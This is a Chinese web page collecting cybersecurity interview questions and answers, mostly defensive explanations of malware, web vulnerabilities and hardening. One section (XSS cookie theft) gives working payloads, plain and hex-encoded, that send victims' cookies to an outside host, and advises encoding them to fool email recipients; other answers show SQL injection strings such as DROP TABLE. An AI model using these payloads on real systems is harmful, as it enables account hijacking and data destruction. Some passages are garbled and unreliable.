网站关键词选取,湖南网络公司排名,收录入口在线提交,wordpress评论表情不显示在当今社会网络安全行业越来越发达#xff0c;也有越来越多的人去学习#xff0c;为了更好地进行工作#xff0c;除了学好知识外还要应对企业的面试。所以在这里我归总了一些网络安全方面的常见面试题#xff0c;希望对大家有所帮助。windows常见
1#xff1a;描述tcp/ud… 在当今社会网络安全行业越来越发达也有越来越多的人去学习为了更好地进行工作除了学好知识外还要应对企业的面试。所以在这里我归总了一些网络安全方面的常见面试题希望对大家有所帮助。
windows常见
1描述tcp/udp的区别及优劣及其发展前景
TCP—传输控制协议,提供的是面向连接、可靠的字节流服务。当客户和服务器彼此交换数据前必须先在双方之间建立一个TCP连接之后才能传输数据。
TCP提供超时重发丢弃重复数据检验数据流量控制等功能保证数据能从一端传到另一端。TCP 建立连接 完整性强 速度慢 UDP—用户数据报协议是一个简单的面向数据报的运输层协议。UDP不提供可靠性它只是把应用程序传给IP层的数据报发送出去但是并不能保证它们能到达目的地。
由于UDP在传输数据报前不用在客户和服务器之间建立一个连接且没有超时重发等机制故而传输速度很快 UDP 不建立连接 不可靠 速度快 优劣当数据传输的性能必须让位于数据传输的完整性、可控制性和可靠性时TCP协议是当然的选择。当强调传输性能而不是传输的完整性时如音频和多媒体应用UDP是最好的选择。在数据传输时间很短以至于此前的连接过程成为整个流量主体的情况下UDP也是一个好的选择如DNS交换。
2.公司网络安全具体指什么? 一、基础网络安全按网络区域划分 1、网络终端安全防病毒网络病毒、邮件病毒、非法入侵、共享资源控制 2、内部局域网LAN安全内部访问控制包括接入控制、网络阻塞网络风暴、病毒检测 3、外网Internet安全非法入侵、病毒检测、流量控制、外网访问控制。 二、系统安全系统层次划分 1、硬件系统级安全门禁控制、机房设备监控视频、防火监控、电源监控后备电源、设备运行监控 2、操作系统级安全系统登录安全、系统资源安全、存储安全、服务安全等 3、应用系统级安全登录控制、操作权限控制。 三、数据、应用安全信息对象划分 1、本地数据安全本地文件安全、本地程序安全 2、服务器数据安全数据库安全、服务器文件安全、服务器应用系统、服务程序安全。
3.如果用户电脑中毒了但用户不想重新安装系统通过什么方法最有效的解决问题? 现在的病毒大多使用网络进行传播作用意识到中病毒后首先断网最直接的方法就是拔网线让后通过别的主机下载专业的杀毒软件比如百度360卡巴斯基等进行病毒深度查杀。
4重装系统意味着什么装注意什么 “重装系统只是一个最简单最易操作的解决手段而已不是最后的手段。如果你有重要数据这种方法就不适合。也可手工清理但要具有一定的专业技术对于一般用户很难清理干净病毒。 1重做系统意味着你的系统盘所有数据都清空了重新换了个新的系统。 2系统做完后不一定就能解决病毒问题。现在的病毒不仅感染C盘还能让其他所有分区都感染上病毒重装系统只是将系统盘C盘的病毒清理掉了开机运行时只要点击其他盘病毒又被激活重新感染系统。仍然无法解决病毒问题。系统感染病毒后并且又重装了系统那么重启后不要点击其他盘先安装有效的杀毒软件升级到最新版然后查杀所有硬盘一般都能搞定。 3重装系统大多装在C盘当然你觉得不麻烦也可装在其他盘
5.如何判断计算机可能已经中马? 计算机系统运行速度减慢。 计算机系统经常无故发生死机。 计算机系统中的文件长度发生变化。 计算机存储的容量异常减少。 系统引导速度减慢。 丢失文件或文件损坏。 计算机屏幕上出现异常显示。 计算机系统的蜂鸣器出现异常声响。 磁盘卷标发生变化。 系统不识别硬盘。 对存储系统异常访问。 键盘输入异常。 文件的日期、时间、属性等发生变化 文件无法正确读取、复制或打开。 命令执行出现错误。 虚假报警。 换当前盘。有些病毒会将当前盘切换到C盘。 时钟倒转。有些病毒会命名系统时间倒转逆向计时。 Windows操作系统无故频繁出现错误。 系统异常重新启动。 一些外部设备工作异常。 异常要求用户输入密码。 Word或Excel提示执行“宏”。
6.恶意软件的定义 恶意软件-Malicious Software,malware 把未经授权便干扰或破坏计算机系统/网络功能的程序或代码一组指令称之为恶意程序。 一组指令可能是二进制文件也可能是脚本语言/宏语言等。
7.木马病毒 太多了自己看吧https://baike.baidu.com/item/木马病毒/333298?fraladdin
8.如何保障Web服务器安全?
维护Web服务器安全是信息安全中最不讨好的差事之一。你需要在相冲突的角色中找到平衡允许对网络资源的合法访问同时阻止恶意破坏。
你甚至会考虑双重认证例如RSA SecurID来确保认证系统的高信任度但是这对所有网站用户来说也许不实用或者不划算。尽管存在这样相冲突的目标仍有六个有助Web服务器安全的步骤。
**1 、对内部和外部应用分别使用单独的服务器 假设组织有两类独立的网络应用面向外部用户的服务和面向内部用户的服务要谨慎地将这些应用部署在不同的服务器上。这样做可以减少恶意用户突破外部服务器来获得对敏感的内部信息地访问。如果你没有可用的部署工具你至少应该考虑使用技术控制例如处理隔离使内部和外部应用不会互相牵涉。 **2 、使用单独的开发服务器测试和调试应用软件 在单独的Web服务器上测试应用软件听起来像是常识——的确是。不幸的是许多组织没有遵循这个基本规则相反允许开发者在生产服务器上调试代码甚至开发新软件。这对安全和可靠性来说都很可怕。在生产服务器上测试代码会使用户遇到故障当开发者提交未经测试易受攻击的代码时引入安全漏洞。大多数现代版本控制系统例如微软的Visual SourceSafe有助于编码/测试/调试过程自动化。 **3 、审查网站活动安全存储日志 每一个安全专业人员都知道维护服务器活动日志的重要性。由于大多数Web服务器是公开的对所有互联网服务进行审核是很重要的。审核有助你检测和打击攻击并且使你可以检修服务器性能故障。在高级安全环境中确保你的日志存储在物理安全的地点——最安全的但是最不方便的技巧是日志一产生就打印出来建立不能被入侵者修改的纸记录前提是入侵者没有物理访问权限。你也许想要使用电子备份例如登录进安全主机用数字签名进行加密来阻止日志被窃取和修改。 **4 、 培训开发者进行可靠的安全编码 软件开发者致力于创建满足商业需求的应用软件却常常忽略了信息安全也是重要的商业需求。作为安全专业人员你有责任对开发者进行影响到Web服务器的安全问题的培训。你应该让开发者了解网络中的安全机制确保他们开发的软件不会违背这些机制还要进行概念的培训例如内存泄漏攻击和处理隔离——这些对编码和生成安全的应用软件大有帮助。 **5 、给操作系统和Web服务器打补丁 这是另一个常识但是当管理员因为其他任务而不堪重荷时常常忽略这一点。安全公告像是CERT或者微软发布的公告提醒人们软件厂商多频繁地发布某些安全漏洞的修补程序。一些工具像是微软的软件升级服务SUS和RedHat的升级服务有助于使这项任务自动化。总之一旦漏洞公布如果你不修补它迟早会被人发现并利用。 **6 、使用应用软件扫描 如果负担地起你也许会考虑使用应用软件扫描器来验证内部编码。像是 Watchfire公司的AppScan这样的工具有助于确保编码在生产环境里不会存在漏洞。记住要有安全意识。设计良好的 Web服务器结构应该基于健全的安全政策。贯彻执行这六个方法会帮助你建立坚固的基础。
9.常见的安全扫描软件 像360 卡巴斯基这样的就不说了 Retina Retina是eEye公司(www.eeye.com)的产品强大的网络漏洞检测技术可以有效的检测并修复各种安全隐患和漏洞并且生成详细的安全检测报告兼容各种主流操作系统、防火墙、路由器等各种网络设备。曾在国外的安全评估软件的评测中名列第一。 Retina的主界面共分为三个部分上部是菜单和工具栏下部的左边是动态导航菜单右边是与左边菜单相对应的内容显示窗口。
ISS(Internet Security Scanner) ISS公司开发和维护的商业漏洞扫描程序它的可移植性和灵活性很强众多的UNIX的平台上都可以运行ISS。 流光 在国内可以与X-Scan相提并论的扫描器它除了能够像 [1] X-Scan那样扫描众多漏洞、弱口令外还集成了常用的入侵工具如字典工具、NT/IIS工具等还独创了能够控制“肉鸡”进行扫描的“流光Sensor工具”和为“肉鸡”安装服务的“种植者”工具。 WINNTAutoAttack 也叫Windows NT/2000 自动攻击探测机常被用扫描肉鸡该软件可以根据目标存在的漏洞自动在对方的计算机上添加用户。
OWASP ZedZAP来自OWASP项目组织的开源免费工具提供漏洞扫描、爬虫、Fuzz功能该工具已集成于Kali Linux系统。
Nikto一款开源软件不仅可用于扫描发现网页文件漏洞还支持检查网页服务器和CGI的安全问题。它支持指定特定类型漏洞的扫描、绕过IDC检测等配置。该工具已集成于Kali Linux系统。
BurpSuite“Scanner”功能用于漏洞扫描可设置扫描特定页面自动扫描结束可查看当前页面的漏洞总数和漏洞明细。虽说也有漏扫功能但其核心功能不在于此因此漏扫功能还是不如其他专业漏洞扫描工具。
Nessus面向个人免费、面向商业收费的形式不仅扫描Web网站漏洞同时还会发现Web服务器、服务器操作系统等漏洞。个人用户只需在官网上注册账号即可获得激活码。它是一款Web网站形式的漏洞扫描工具。
还有深信服扫描华为云在线安全扫描除此之外还有一些其他商业漏洞扫描软件Safe3 WVS、IBM公司的AppScan、以及其他特定网站类型的扫描工具针对jboss的jboss-autopwn、针对joomla的joomscan、针对wordpress的wpscan。
10.木马的传播途径主要有哪些? 木马主要是依靠邮件、下载等途径进行传播 木马也可以通过各种脚本进行传播。比如IE浏览器在执行脚本时存在一些漏洞入侵者可以利用这些漏洞进行木马的传播与种植。当目标主机执行了木马的服务端程序之后入侵者便可以通过客户端程序与目标主机上的服务端建立连接进而控制目标主机。对于通信协议的选择绝大多数木马使用的是TCP/IP协议但也有使用UDP协议的木马。所以做好木马的检测工作可以及时的发现以及处理木马降低木马所带来的损失。
11.常见的Web漏洞有哪些?
用户验证漏洞没有正确的对用户进行验证 2. 用户凭证管理问题没有正确的对用户凭证进行创建保存传输和保护用户凭证包括用户密码等 3. 权限特权以及访问控制漏洞 4. 缓存漏洞 5. 跨站脚本漏洞 6. 加密漏洞 7. 路径切换漏洞用户输入可以包含”…”等字符来对应用程序路径进行切换和读取 8. 代码注入漏洞 9. 配置漏洞 10. 数据泄漏和信息 11. 输入验证漏洞 12. 操作系统命令脚本注入 13. 资源管理漏洞允许用户操作过多的服务器资源比如CPU内存等等 14. SQL注入 15. 链接跟踪允许用户直接用链接访问或者下载用户不该访问的文件
12。Web应用常见的安全漏洞有哪些?
随着存在安全隐患的Web应用程序数量的骤增Open Web Application Security Project 开放式Web应用程序安全项目缩写为OWASP总结出了现有Web应用程序在安全方面常见的十大漏洞以提醒企业及其程序开发人员尽量避免它们给企业IT系统带来的安全风险
非法输入 Unvalidated Input 在数据被输入程序前忽略对数据合法性的检验是一个常见的编程漏洞。随着OWASP对Web应用程序脆弱性的调查非法输入的问题已成为大多数Web应用程序安全漏洞方面的一个普遍现象。
失效的访问控制 Broken Access Control 大部分企业都非常关注对已经建立的连接进行控制但是允许一个特定的字符串输入可以让攻击行为绕过企业的控制。
失效的账户和线程管理 Broken Authentication and Session Management 有良好的访问控制并不意味着万事大吉企业还应该保护用户的密码、会话令牌、账户列表及其它任何可为攻击者提供有利信息、能帮助他们攻击企业网络的内容。
跨站点脚本攻击 Cross Site Scripting Flaws 这是一种常见的攻击当攻击脚本被嵌入企业的Web页面或其它可以访问的Web资源中没有保护能力的台式机访问这个页面或资源时脚本就会被启动这种攻击可以影响企业内成百上千员工的终端电脑。
缓存溢出问题 Buffer Overflows 这个问题一般出现在用较早的编程语言、如C语言编写的程序中这种编程错误其实也是由于没有很好地确定输入内容在内存中的位置所致。
注入式攻击 Injection Flaws 如果没有成功地阻止带有语法含义的输入内容有可能导致对数据库信息的非法访问在Web表单中输入的内容应该保持简单并且不应包含可被执行的代码。
异常错误处理 Improper Error Handling 当错误发生时向用户提交错误提示是很正常的事情但是如果提交的错误提示中包含了太多的内容就有可能会被攻击者分析出网络环境的结构或配置。
不安全的存储 Insecure Storage 对于Web应用程序来说妥善保存密码、用户名及其他与身份验证有关的信息是非常重要的工作对这些信息进行加密则是非常有效的方式但是一些企业会采用那些未经实践验证的加密解决方案其中就可能存在安全漏洞。
程序拒绝服务攻击 Application Denial of Service 与拒绝服务攻击 (DoS)类似应用程序的DoS攻击会利用大量非法用户抢占应用程序资源导致合法用户无法使用该Web应用程序。
不安全的配置管理 Insecure Configuration Management 有效的配置管理过程可以为Web应用程序和企业的网络架构提供良好的保护。
以上十个漏洞并不能涵盖如今企业Web应用程序中的全部脆弱点它只是OWASP成员最常遇到的问题也是所有企业在开发和改进Web应用程序时应着重检查的内容。
13.防御和检查SQL注入的主要手段有哪些?
1.在代码中使用参数化的过滤性语句 2.避免使用解释程序 3.防范SQL注入对应用程序的异常进行包装处理避免出现一些详细的错误消息 4.使用专业的漏洞扫描工具对服务器和应用程序进行安全扫描。 5.在Web应用程序开发过程的所有阶段实施代码的安全检查
14.什么是网络安全中的双因素认证?
双因素是密码学的一个概念从理论上来说身份认证有三个要素 第一个要素所知道的内容 需要使用者记忆的身份认证内容例如密码和身份证号码等。 第二个要素所拥有的物品使用者拥有的特殊认证加强机制例如动态密码卡令牌IC卡磁卡等。 第三个要素所具备的特征使用者本身拥有的惟一特征例如指纹、瞳孔、声音等。 单独来看这三个要素中的任何一个都有问题。“所拥有的物品”可以被盗走“所知道的内容”可以被猜出、被分享复杂的内容可能会忘记“所具备的特征”最为强大但是代价昂贵且拥有者本身易受攻击一般用在顶级安全需求中。把前两种要素结合起来的身份认证的方法就是“双因素认证”。 双因素认证和利用自动柜员机提款相似使用者必须利用提款卡(认证设备)再输入个人识别号码(已知信息)才能提取其账户的款项。 由于需要用户身份的双重认证双因素认证技术可抵御非法访问者提高认证的可靠性。简而言之该技术降低了电子商务的两大风险来自外部非法访问者的身份欺诈和来自内部的更隐蔽的网络侵犯
15.作为网站管理者应当如何防范XSS?
坚决不要相信任何用户输入并过滤所有特殊字符。这样既可消灭绝大部分的XSS攻击。另一个建议是输出页面时将 变换成 。要记住XSS漏洞极具破坏性一旦被利用它会给你的事业带来极大的损害。攻击者会将这些漏洞公之于众这会在用户隐私的问题上大大降低你的网站的用户信赖度。当然仅仅将 ( 和 ) 变换成 是不够的最好将 ( 和 ) 变换成 ( 和 )# 和 变换成 # 和 。
16.SQL注入攻击的漏洞点有哪些? 1.没有正确过滤转义字符 SELECT * FROM users WHERE name ‘” userName “‘; SELECT * FROM users WHERE name ‘a’ OR ‘t’t’; 2.错误的类型处理 SELECT * FROM data WHERE id ” a_variable “; SELECT * FROM DATA WHERE id 1; DROP TABLE users; 3.数据库服务器中的漏洞 MYSQL服务器中mysql_real_escape_string()函数漏洞允许一个攻击者根据错误的统一字符编码执行成功的SQL注入式攻击 4.盲目SQL注入式攻击 Absinthe的工具就可以使这种攻击自动化 5.条件响应 6.条件性差错 7.时间延误
17.sql注入攻击的手法 联合查询 报错注入 布尔盲注 延时注入
18.能否解释一下XSS cookie盗窃是什么意思?
根据作为攻击对象的Web程序下面某些变量和插入位置可能需要进行调整。要注意这只是攻击方法的一个例子。在这个例子中我们将利用脚本“a.php”中的 “viriable”变量中的跨站脚本漏洞通过正常请求进行攻击。这是跨站脚本攻击最常见的形式。 第一步: 锁定目标 当你找到某个Web程序存在XSS漏洞之后检查一下它是否设置了cookie。如果在该网站的任何地方设置了cookie那么就可以从用户那里盗取它。 第二步: 测试 不同的攻击方式将产生不同的XSS漏洞所以应适当进行测试以使得输出结果看起来像是正常的。某些恶意脚本插入之后会破坏输出的页面。为欺骗用户输出结果非常重要因此攻击者有必要调整攻击代码使输出看起来正常。
下一步你需要在链接至包含XSS漏洞的页面的URL中插入 Javascript或其他客户端脚本。下面列出了一些经常用于测试XSS漏洞的链接。当用户点击这些链接时用户的cookie奖被发送到 www.cgisecurity.com/cgi-bin/cookie.cgi 并被显示。如果你看到显示结果中包含了cookie信息说明可能可以劫持该用户的账户。 盗取Cookie的Javascript示例。使用方法如下。
ASCII用法 http://host/a.php?variable”document.location’http://www.cgisecurity.com/cgi-bin/cookie.cgi? ‘%20document.cookie 十六进制用法 http://host/a.php?variable
%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67 %69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f %6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
注意: 每种用法都先写为ASCII再写成十六进制以便复制粘贴。
“document.location’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ document.cookie
HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e %6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65 %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f %63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
document.location’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ document.cookie
HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c %2f%73%63%72%69%70%74%3e document.location’http://www.cgisecurity.com/cgi-bin/cookie.cgi?’ document.cookie
HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75 %72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65 %3c%2f%73%63%72%69%70%74%3e
第三步: 执行XSS 将做好的URL通过电子邮件或其他方式发送出去。注意如果你直接将URL发送给其他人通过电子邮件、即时通讯软件或其他方式你应当将其进行十六进制编码因为这些URL一眼便可看出包含恶意代码但经过十六进制编码之后就可以欺骗大部分人。 第四步: 处理收集到的信息 一旦用户点击了你的URL相应数据就会被发送到你的CGI脚本中。这样你就获得了 cookie信息然后你可以利用Websleuth之类的工具来检查是否能盗取那个账户。
在上面的例子中我们仅仅将用户带到了 cookie.cgi页面上。如果你有时间你可以在CGI中将用户重定向到原来的页面上即可在用户不知不觉之中盗取信息。
某些电子邮件程序在打开附件时会自动执行附件中的Javascript代码。即使像Hotmail这样的大型网站也是如此不过它对附件内容作了许多过滤以避免cookie被盗。
19.IBatis如何防范SQL 注入攻击?
风险数据库资料被窃取服务器被攻击者控制 漏洞1 示例 在sqlmap中如下写法 select * from table where name like ‘% v a l u e value value%’ UnSafeBean b (UnSafeBean)sqlMap.queryForObject(“value”, request.getParameter(“name”)); 漏洞1 说明 其中sqlmap方式是把 ∗ * ∗ 替换假设用户输入 ‘;drop table admin– 那么翻译为本地SQL为 select * from table where name like ‘%’;drop table admin–%’ 修补方法 采用 #*# 的方式 sqlmap是采用 预编译方式处理 把转义操作交给数据库本身 select * from table where name like ‘%’||#value#||’%’
漏洞2 示例
O r d e r I d OrderId OrderId s o r t S e q sortSeq sortSeq String orderId group.getField(“orderId”).getStringValue(); query.setOrderId(StringUtils.isNotBlank(orderId)?orderId:null); PaginationQueryList pageList orderService.listCustomerOrderForMistinessQuery(query); 漏洞2 说明 其中sqlmap方式是把 ∗ * ∗ 替换假设用户输入 a;drop table admin– 那么翻译为本地SQL为 select * from PRIVATE_SHOWROOM_PRODUCT order by a;drop table admin– 修补方法
O r d e r I d : M E T A D A T A OrderId:METADATA OrderId:METADATA s o r t S e q : S Q L K E Y W O R D sortSeq:SQLKEYWORD sortSeq:SQLKEYWORD
20.恶意软件的定义 恶意软件-Malicious Software,malware 把未经授权便干扰或破坏计算机系统/网络功能的程序或代码一组指令称之为恶意程序。 一组指令可能是二进制文件也可能是脚本语言/宏语言等。
21.什么是网页挂马?网页挂马都有什么类型?
网页挂马就是攻击者通过在正常的页面中(通常是网站的主页)插入一段代码。浏览者在打开该页面的时候这段代码被执行然后下载并运行某木马的服务器端程序进而控制浏览者的主机。 挂网马的目的让访问该网页的主机下载某木马的服务器端程序进而控制浏览者的主机。 网页挂马的类型 1、框架嵌入式网络挂马 网页木马被攻击者利用iframe语句加载到任意网页中都可执行的挂马形式是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下 解释在打开插入该句代码的网页后就也就打开了http://www.xxx.com/muma.html页面但是由于它的长和宽都为“0”所以很难察觉非常具有隐蔽性。下面我们做过做个演示比如在某网页中插入如下代码 在“百度”中嵌入了“IT168安全版块”的页面效果如图1。(图1) 2、js调用型网页挂马 js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术如黑客先制作一个.js文件然后利用js代码调用到挂马的网页。通常代码如下 http://www.xxx.com/gm.js就是一个js脚本文件通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成攻击者只需输入相关的选项就可以了如图2就是一个JS木马的代码。(图2) 3、图片伪装挂马 随着防毒技术的发展黑手段也不停地更新图片木马技术逃避杀毒监视的新技术攻击者将类似 http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中这些嵌入代码的图片都可以用工具生成攻击者只 需输入相关的选项就可以了如图3。图片木马生成后再利用代码调用执行是比较新颖的一种挂马隐蔽方法实例代码如 注当用户打开http://www.xxx.com/test.htm是显示给用户的是http://www.xxx.com/test.jpg而http://www.xxx.com/test.htm网页代码也随之运行。(图3)
4、网络钓鱼挂马(也称为伪装调用挂马) 网络中最常见的欺骗手段黑客们利用人们的猎奇、贪心等心理伪装构造一个链接或者一个网页利用社会工程学欺骗方法引诱点击当用户打开一个 看似正常的页面时网页代码随之运行隐蔽性极高。这种方式往往和欺骗用户输入某些个人隐私信息然后窃取个人隐私相关联。比如攻击者模仿腾讯公司设计了 一个获取QQ币的页面引诱输入QQ好和密码如图4。(图4) 等用户输入完提交后就把这些信息发送到攻击者指定的地方如图5。(图5)
5、伪装挂马 高级欺骗黑客利用IE或者Fixfox浏览器的设计缺陷制造的一种高级欺骗技术当用户访问木马页面时地址栏显示www.sina.com或者security.ctocio.com.cn等用户信任地址其实却打开了被挂马的页面从而实现欺骗示例代码如 上面的代码的效果在貌似http://safe.it168.com的链接如图6上点击却打开了http://www.hacker.com.cn如图7 总结上述的挂马方式都是利用了系统的漏洞并且挂马的代码不用攻击者编写都是实现了工具化、傻瓜化。技术门槛比较低因此危害也特别大。
22.如何查找网页漏洞?
网页的漏洞主要有注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞等等。针对这么多的漏洞威胁网站管理员要对自己的网站进行安全 检测然后进行安全设置或者代码改写。那如何来检测网站存在的漏洞呢?其实很多攻击者都是通过一些黑客工具来检测网站的漏洞然后实施攻击的。那么网站的 管理员就可以利用这些工具对网站进行安全检测看有没有上述漏洞笔者就不一一演示了。下面就列举一个当前比较流行的eWEBEditor在线HTML编 辑器上传漏洞做个演示和分析。
1、网站入侵分析 eWEBEditor是一个在线的HTML编辑器很多网站都集成这个编辑器以方便发布信息。低版本的eWEBEditor在线HTML编辑器存在着上传漏洞黑客利用这点得到WEBSHELL(网页管理权限)后修改了网站进行了挂马操作。 其原理是eWEBEditor的默认管理员登录页面没有更改而且默认的用户名和密码都没有更改。攻击者登陆eWEBEditor后添加一种新的样式类型然后设置上传文件的类型比如加入asp文件类型就可以上传一个网页木马了。(图8) 2、判断分析网页漏洞
(1)攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似”ewebeditor.asp?id”语句只要类似的语句存在就能判断网站确实使用了WEB编辑器。
(2)eWEBEditor编辑器可能被黑客利用的安全漏洞 a.管理员未对数据库的路径和名称进行修改导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。 直接下载默认路径的数据库 b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆或者直接输入默认的用户名和密码直接进入编辑器的后台。 从数据库中获得账号密码登进后台 c.该WEB编辑器上传程序存在安全漏洞。 可直接上传木马
23网页木马的防御和清除
1、防御网页木马服务器设置非常重要反注册、卸载危险组件
(网页后门木马调用的组件) (1)卸载wscript.shell对象在cmd先或者直接运行 regsvr32 /u %windir%system32WSHom.Ocx
存在绕过现在这里卸载了到时候攻击的时候再装上就可以了 (2)卸载FSO对象在cmd下或者直接运行 regsvr32.exe /u %windir%system32scrrun.dll (3)卸载stream对象在cmd下或者直接运行 regsvr32.exe /u /s “C:Program FilesCommon FilesSystemadomsado15.dll” 注如果想恢复的话只需重新注册即可例如regsvr32 %windir%system32WSHom.Ocx
2、清理网页挂马 (1)利用雷客图ASP站长安全助手查找所有在2008-3.1日-2008.3.5日之间所有修改过的文件里是否有iframe语句和http://www.xxx.com/a.htm关键词进行手工清理。 (2)也可利用雷客图ASP站长安全助手批量删除网马。 (3)检测JS文件在2008-3.1日-2008.3.5日之间增加的JS文件全部删除。(图9)
从分析报告可以看到网站的admin路径下发现lb.asp网页木马经分析为老兵的网页木马。(加密后依旧能通过特征码分辨推荐网 站管理员使用雷客ASP站长安全助手经常检测网站是否被非法修改。)
提示雷客图ASP站长安全助手可以帮助站长分析网站的安全状况但是一定要更改它的默认用户名和密码。
3、解决eWEBEditor编辑器安全隐患 由于网站在开发时集成了eWEBEditor编辑器删除或者替换容易导致其他问题的出现推荐按如下方案解决 (1)修改该编辑器的默认数据库路径和数据库名防止被黑客非法下载。 默认登录路径admin_login.asp 默认数据库db/ewebeditor.mdb (2)修改编辑器后台登录路径和默认的登录用户名和密码防止黑客进入管理界面。 默认帐号admin 默认密码admin或者admin888(图10) (3)对Upload.asp语句进行修改防止黑客利用其上传ASP木马从而获得WEB权限。 对上传语句现在进行修改
将原来的sAllowExtReplace(UCase(sAllowExt),”ASP”,”)
修改为sAllowExtReplace(UCase(sAllowExt),”ASP”,”“),”CER”,””),”ASA”,”“),”CDX”,””),”HTR”,”)
增加上传对cer、asa、cdx、htr文件类型的限制因为这些类型的文件都是可以执行的文件可以被攻击者利用进行对网站及其服务器进行危险操作的文件类型。
24.常见的企业安全问题
01
电子邮件中的病毒
安全检查不仅可以监控用户的流量还可以帮助企业检查所有电子邮件。企业可以做的不仅仅是过滤垃圾邮件还能够检查邮件正文中的附件和链接。这种控制很容易实现。只需将邮件服务器配置为将所有电子邮件副本转发到正在运行MTA(邮件传输代理)的Check Point。如果使用的是Exchange企业电子邮件服务则可以使用密件抄送(Bcc)。这种方法的主要好处是企业在用户的反垃圾邮件解决方案过滤后检查电子邮件。然而令人感觉奇怪的是总是不断通过恶意邮件。电子邮件流量安全的当前机制在大多数情况下根本无法应对这种任务。
为什么电子邮件病毒会有危险?
根据最新报告电子邮件继续在恶意软件分发生态系统中占主导地位。恶意代码可以作为附件文件查收也可以通过指向随机在线资源(如Google Drive)的链接进行轮询。在病毒传播方面SMTP流量优于其他协议。此外病毒不一定是.exe文件它们也可以伪装成用户通常信任的.doc或.pdf文档。
02
网络钓鱼
几乎所有评估都会发现员工点击网络钓鱼链接遭遇攻击的实例。PayPai、Office 356、Fasebook、Appie等网站有着无数的网络钓鱼链接试图吸引用户。网络钓鱼攻击的载体正在急剧上升其原因很简单如果可以简单地欺骗一个轻信的用户为什么要制造复杂的病毒呢?人类永远是企业网络安全中最薄弱的环节。
是什么让网络钓鱼如此危险?
网络钓鱼在某种程度上是用户的个人问题。一旦有人打开网络钓鱼链接遭受损失就会提高警惕。但攻击者可能会以这种方式窃取企业数据其中包括电子邮件地址、密码和重要文件。许多人重复使用公司提供的用户名和密码来注册公共站点例如社交网络和torrent文件的洪流跟踪器。如果用户可以在其所有账户使用同一个密码为什么要记住一堆密码呢?这可能是他们的想法。
03
从企业网络上传到云端
云存储(Dropbox、Google Drive等)是另一个IT安全问题。现在每个人都使用这些服务。但是要知道企业网络中的某个人使用它们是一回事而在这些渠道上浪费数GB的流量则是另一回事。大约80%被评估的公司都遇到了这个问题。
是什么让这样的上传数据有害?
有人可能正在泄露公司数据。除非采用数据泄露防护(DLP)解决方案否则无法看到究竟泄露了什么。但是不仅是将数据上传到云资源会带来风险下载数据同样有害。黑客多年来一直在通过公共文件存储库传播病毒。
04
远程访问工具
这是另一个令人不安的事实。在绝大多数公司中有些人使用远程访问服务例如TeamViewer。但没有人能保证是远程访问其工作计算机的人员。它可能是企业原来的员工或网络犯罪分子。
远程访问工具的风险是什么?
除了未经批准的访问之外还面临一个风险文件传输。尤其令人不安的是在这些会话过程中大量的流量(GB级数据)来回传输移动。大多数远程访问实用程序都具有加密措施因此无法了解正在下载或上传的内容。不过总的来说它是私有数据泄漏的主要渠道。
05
员工使用VPN工具和代理
只使用Internet Explorer访问已添加书签的网站的传统做法已经落后。如今的做法已经变得更加高级再也不能用代理和匿名者来迷惑他人。安全评估显示许多企业员工几乎都使用Tor或VPN。他们使用这些工具在组织中阻止玩游戏或观看非法视频。除非组织采用保护IT周边的下一代防火墙(NGFW)否则几乎不可能阻止。
使用VPN的风险是什么?
员工滥用内部指南这一事实并不是使用VPN最危险的事情。最大的担忧是加密流量将渗透到网络边界。即使企业拥有适用于防病毒和IPS功能的高效边缘设备也无法跟踪这样的活动。用户可以通过加密通道传输任何内容其中包括恶意软件。此外他们可能不知道他们正在下载恶意内容而这同样适用于HTTPS流量。如果没有在网络边界使用安全套接层(SSL)检查则会出现与Internet带宽相当的安全漏洞。
许多IT安全管理人员都惊讶地发现很多人通过匿名化工具在网络中传输大量的信息而通过这些渠道传输内容很可能是一个谜。
06
Torrents
在几乎所有调查的公司中一些人使用BitTorrent或其他P2P服务下载文件。而且以这种方式下载的数据量是巨大的。在一个案例中员工每周下载2TB的数据。人们可能会认为每个人都可以在家中使用高速互联网那么为什么要在公司下载数据?
是什么让Torrents变得危险?
